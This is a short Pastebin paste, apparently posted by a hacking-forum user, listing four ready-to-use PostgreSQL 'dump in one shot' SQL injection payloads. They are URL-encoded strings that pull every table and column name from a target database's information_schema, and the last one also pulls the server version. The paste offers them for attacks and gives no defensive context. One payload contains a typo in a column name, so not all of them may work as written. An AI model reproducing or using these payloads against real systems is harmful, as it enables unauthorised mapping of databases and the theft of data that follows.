Krypton404

PostgreSQL Injection DIOS

Jul 2nd, 2017
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. FOR POSTGRE 8.4 >
  2.  
  3. (select+array_to_string(array_agg(concat(table_name,'::',column_name)::text),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$informatio​n_schema$$,$$pg_catalog$$))
  4.  
  5.  
  6. 2.FOR POSTGRE 9.1>
  7.  
  8. (select+string_agg(concat(table_name,'::',column_name),$$%3Cli%3E$$)from+informa​tion_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalo​g$$))
  9.  
  10.  
  11. 3. ALL VERSION
  12. (select+array_to_string(array(select+table_name||':::'||column_name::text+from+i​nformation_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)),'%3Cli%3E'))
  13.  
  14.  
  15. 4.
  16. 'Makman ::: '||version()||'<br>'||(SELECT array_to_string(array(SELECT('===>'||T0ltable_name||' :: '||column_name)::text FROM information_schema.columns where table_schema='public'),'<br>'))
  17.  
  18.  
  19. #cyberbaghost {hackforums.net}
Add Comment
Please, Sign In to add comment